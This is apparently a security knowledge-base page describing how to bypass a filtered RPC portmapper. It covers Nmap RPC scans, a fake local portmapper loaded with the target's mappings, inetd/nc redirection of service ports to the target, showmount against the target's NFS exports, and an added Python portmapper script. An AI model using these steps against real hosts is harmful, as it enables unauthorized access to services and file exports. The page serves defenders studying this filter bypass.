Bypass RPC Portmapper Filtering

Portmapper is a registry of Remote Procedure Call (RPC) services: for each service it records the RPC program number, version number, transport protocol (TCP or UDP) and the port the service is listening on. It generally runs on port 111 TCP/UDP.

When a client wishes to use an RPC service it first asks the portmapper which port that service is listening on. An administrator may filter port 111, believing that this prevents an attacker from connecting to the services it advertises. This is not the case: the service ports themselves are usually still reachable, so an attacker can replicate the portmapper locally (populated with the mappings found by scanning) and proxy each service port through to the target machine.

Impact: An attacker may be able to connect to vulnerable RPC services on a host whose portmapper port is filtered.

Affected: Unix Servers


First of all, determine the RPC services offered by the target by scanning the usual RPC port ranges with Nmap's RPC scan (newer Nmap releases fold RPC grinding into version detection, -sV, so use that if -sR is not accepted). <target> stands for the target's address, which is absent from this page:

nmap -sR -p 111-5000,20000-50000 <target>
nmap -sUR -p 111-5000,20000-50000 <target>

Create a port map file (rpc_file_data below) containing the information discovered by Nmap, one mapping per line in the same column order as pmap_dump / rpcinfo -p output: program number, version, protocol, port and, optionally, the service name. Note the program numbers are six digits (100000 is the portmapper itself, 100003 is NFS). For a target exporting NFS:

100000 2 tcp 111 portmapper
100000 2 udp 111 portmapper
100003 2 tcp 2049 nfs
100003 3 tcp 2049 nfs
100003 4 tcp 2049 nfs
100003 2 udp 2049 nfs
100003 3 udp 2049 nfs
100003 4 udp 2049 nfs

Start a local portmapper (portmap, or rpcbind on newer systems; this needs root and no other portmapper listening on 111) and load the port map file into it with pmap_set:

# portmap
# pmap_set < rpc_file_data

Test the setup by running rpcinfo against YOUR machine; it should now list the target's services:

# rpcinfo -p

Now set up the attacking machine to redirect each mapped port to the target.

Store the mappings in a tab-separated inetd configuration file, inetd.conf, one line per port and protocol. The fields are: service (a port number or an /etc/services name), socket type, protocol, wait/nowait, user, server program and its arguments. Here tcpd simply execs nc, which connects to the same port on the target (<target> is the target's address, absent from this page):

2049	stream	tcp	nowait	root	/usr/sbin/tcpd	/bin/nc <target> 2049
2049	dgram	udp	wait	root	/usr/sbin/tcpd	/bin/nc -u <target> 2049

Then replace the running inetd with one that uses this file:

# killall inetd
# inetd ./inetd.conf

Now a client on the attacking machine that asks the local portmapper for a service is given a local port, and inetd proxies the connection to the same port on the target. You can therefore use ordinary client software, for example showmount (for it to work, mountd, program 100005, must also be in the port map file and redirected; the Nmap scan will show its port):

 # showmount -e

Example output (the host name, absent from this page, is the attacking machine's):

Export list for <attacking host>:
 / (everyone)

This export list is not the attacking machine's but the target server's.
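As an added example (not part of the original page), the following Python script stands in for the portmap + pmap_set step with a small portmapper of its own: it speaks just enough of the RPC portmapper v2 protocol (NULL, GETPORT and DUMP, over UDP and over TCP with record marking) to answer rpcinfo and NFS clients from a static copy of the target's mappings. The mapping table is constructed from the example port map file above; the inetd/nc redirection from the page still carries the actual service traffic. It assumes it is run as root with the system's own portmap/rpcbind stopped; build_call, getport_result, frame_record and the other helpers are this example's own names, not a library API.

```python
#!/usr/bin/env python3
# Minimal ONC RPC portmapper (program 100000, v2) answering NULL, GETPORT and DUMP
# from a static table. Added example, not from the original page: it stands in for
# portmap + pmap_set; the inetd/nc redirectors still do the forwarding. Needs root
# to bind port 111, and the system's own portmap/rpcbind must be stopped first.
import socket, struct, threading

PMAP_PROG, PMAP_VERS, PROC_NULL, PROC_GETPORT, PROC_DUMP = 100000, 2, 0, 3, 4
TCP, UDP = 6, 17                                # IPPROTO numbers used by portmapper
# Constructed table mirroring the NFS port map file above: (prog, vers, prot) -> port
MAPPINGS = {(100000, 2, TCP): 111, (100000, 2, UDP): 111}
for ver in (2, 3, 4):
    MAPPINGS[(100003, ver, TCP)] = MAPPINGS[(100003, ver, UDP)] = 2049

def parse_call(msg):
    # RPCv2 CALL (RFC 5531): xid, msg_type=0, rpcvers=2, prog, vers, proc, then
    # credential and verifier as opaque_auth {flavor, length, body}, then the args
    xid, mtype, rpcvers, prog, vers, proc = struct.unpack_from(">6I", msg, 0)
    if mtype != 0 or rpcvers != 2:
        raise ValueError("not an RPCv2 CALL message")
    off = 24
    for _ in range(2):
        _flavor, length = struct.unpack_from(">II", msg, off)
        off += 8 + ((length + 3) & ~3)          # XDR pads opaque bodies to 4 bytes
    return xid, prog, vers, proc, msg[off:]

def reply(xid, accept_stat, result=b""):
    # REPLY (1), MSG_ACCEPTED (0), AUTH_NULL verifier (0, 0), accept_stat, result
    return struct.pack(">6I", xid, 1, 0, 0, 0, accept_stat) + result

def handle_call(msg):
    """Answer one portmapper request; returns the raw RPC reply."""
    xid, prog, vers, proc, args = parse_call(msg)
    if prog != PMAP_PROG or vers != PMAP_VERS:
        return reply(xid, 1)                    # PROG_UNAVAIL
    if proc == PROC_NULL:
        return reply(xid, 0)
    if proc == PROC_GETPORT:                    # args: mapping {prog, vers, prot, port}
        p, v, prot, _ = struct.unpack_from(">4I", args, 0)
        return reply(xid, 0, struct.pack(">I", MAPPINGS.get((p, v, prot), 0)))
    if proc == PROC_DUMP:                       # result: XDR list (1, mapping)* then 0
        body = b"".join(struct.pack(">5I", 1, p, v, prot, port)
                        for (p, v, prot), port in MAPPINGS.items())
        return reply(xid, 0, body + struct.pack(">I", 0))
    return reply(xid, 3)                        # PROC_UNAVAIL

def build_call(xid, proc, *args):
    """Encode a portmapper CALL with AUTH_NULL cred and verf (as rpcinfo sends it);
    args are packed as XDR unsigned ints, e.g. the GETPORT mapping."""
    hdr = struct.pack(">10I", xid, 0, 2, PMAP_PROG, PMAP_VERS, proc, 0, 0, 0, 0)
    return hdr + struct.pack(">%dI" % len(args), *args)
def getport_result(rep):
    """Port carried by a GETPORT reply, or None if the call was not accepted."""
    _xid, mtype, rstat, _vf, _vl, astat = struct.unpack_from(">6I", rep, 0)
    return struct.unpack_from(">I", rep, 24)[0] if (mtype, rstat, astat) == (1, 0, 0) else None
def frame_record(payload):
    # TCP record marking: 4-byte header, high bit = last fragment, rest = length
    return struct.pack(">I", 0x80000000 | len(payload)) + payload
def recv_exact(conn, n):
    buf = b""
    while len(buf) < n and (chunk := conn.recv(n - len(buf))):
        buf += chunk
    return buf if len(buf) == n else None

def read_record(conn):
    """Reassemble one RPC record from its TCP record-marking fragments."""
    record, last = b"", False
    while not last:
        hdr = recv_exact(conn, 4)
        frag = hdr and recv_exact(conn, struct.unpack(">I", hdr)[0] & 0x7FFFFFFF)
        if frag is None:
            return None
        record, last = record + frag, bool(hdr[0] & 0x80)
    return record

def serve_tcp_client(conn):
    with conn:
        while (rec := read_record(conn)) is not None:
            try:
                conn.sendall(frame_record(handle_call(rec)))
            except (ValueError, struct.error):
                return                          # malformed request: drop the client

def serve_udp(port=111):
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.bind(("0.0.0.0", port))
    while True:
        data, peer = s.recvfrom(65535)
        try:
            s.sendto(handle_call(data), peer)
        except (ValueError, struct.error):
            pass                                # malformed request: ignore it

def serve_tcp(port=111):
    ls = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ls.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    ls.bind(("0.0.0.0", port)); ls.listen(5)
    while True:
        conn, _ = ls.accept()
        threading.Thread(target=serve_tcp_client, args=(conn,), daemon=True).start()

if __name__ == "__main__":
    threading.Thread(target=serve_udp, daemon=True).start()
    serve_tcp()
```

With the script running, rpcinfo -p on the attacking machine lists the same programs a real portmapper would. A GETPORT for a program that is not in the table answers with port 0, which is how a portmapper says "not registered", so add mountd (100005) and anything else the Nmap scan found before trying showmount or a mount.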